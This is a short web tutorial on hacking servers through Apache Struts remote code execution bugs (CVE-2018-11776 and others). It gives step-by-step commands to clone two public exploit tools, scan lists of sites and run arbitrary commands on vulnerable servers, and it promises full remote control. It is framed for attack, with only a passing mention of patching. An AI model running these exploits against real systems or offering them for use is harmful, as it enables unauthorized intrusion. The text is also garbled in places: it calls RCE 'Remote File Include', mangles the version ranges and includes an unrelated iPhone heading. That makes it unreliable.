facebook facebook twitter rss

Hack server with apache struts exploit

Author: Rednofozi , Published: 01-11-2018
 Hack server with apache struts exploit
Description

After a while, we again saw a new and sensitive bug for Apache Struts

A new vulnerability has been discovered for the Apache-Struts service, which is rce type (Remote File Include)

This security hole is in versions 2, 3 to 2, 3, 34 | There are 2.5-5.2.5.16

And to update the server security, be sure to update it to the latest version

This vulnerability can be used in a variety of ways, but in this tutorial, we introduce two tools that are easy to use.


Hacking the server training using the first method

Be careful at first. In the system you want to test the exploit, install Python 2 or 3, because the tool is written in Python.

Download the tool from the download section at the bottom of the page. To download as a folder in your Linux, use the following command

git clone link

Then enter the downloaded folder with the following command, which is the main tool

cd struts-pwn_CVE-2018-11776

To check the site that is vulnerable to this vulnerability, enter the address below as shown below

python3 struts-pwn.py -url https://site.com/struts2-showcase/index.action

If you want to check multiple websites at the same time, save them in a file and submit your file to the program as a list to be saved.

python3 struts-pwn.py -list list-site.txt

Use the following command to use this vulnerability:

python3 struts-pwn.py -exploit -url 'https://site.com/struts2-showcase/index.action' -c id

Server penetration testing through APAC
Secondary Hacking Method Secondary Hacking Tool

Another tool we introduce to use vulnerabilities with the following identifiers

CVE-2013-2251
CVE-2017-5638
CVE-2018-11776

Hack iphone and ways to deal

First download the tool from the download section

git clone link

Then enter the downloaded folder

cd Apache-Struts-v3

Now run the tool with the following command

python ApacheStruts.py

Apache struts vulnerability tool

After the tool is executed, it does not need to be used as a switch, and each option you want to use is in the toolbar

The tool that was executed will enter the link of the site you want and run exploit if there is a vulnerability.

You will have full access to the remote control and you can execute your commands on the site server

Conclusion

The second tool introduced is a relatively simpler way to hack the server, but the second tool gives you more options.

Your choice depends on your type of work and to ensure security against this security hole, be sure to update all installed server packages.


Download tools

The first tool
https://github.com/mazen160/struts-pwn_CVE-2018-11776.git


Second tool
https://github.com/s1kr10s/Apache-Struts-v3.git

Like us on Facebook :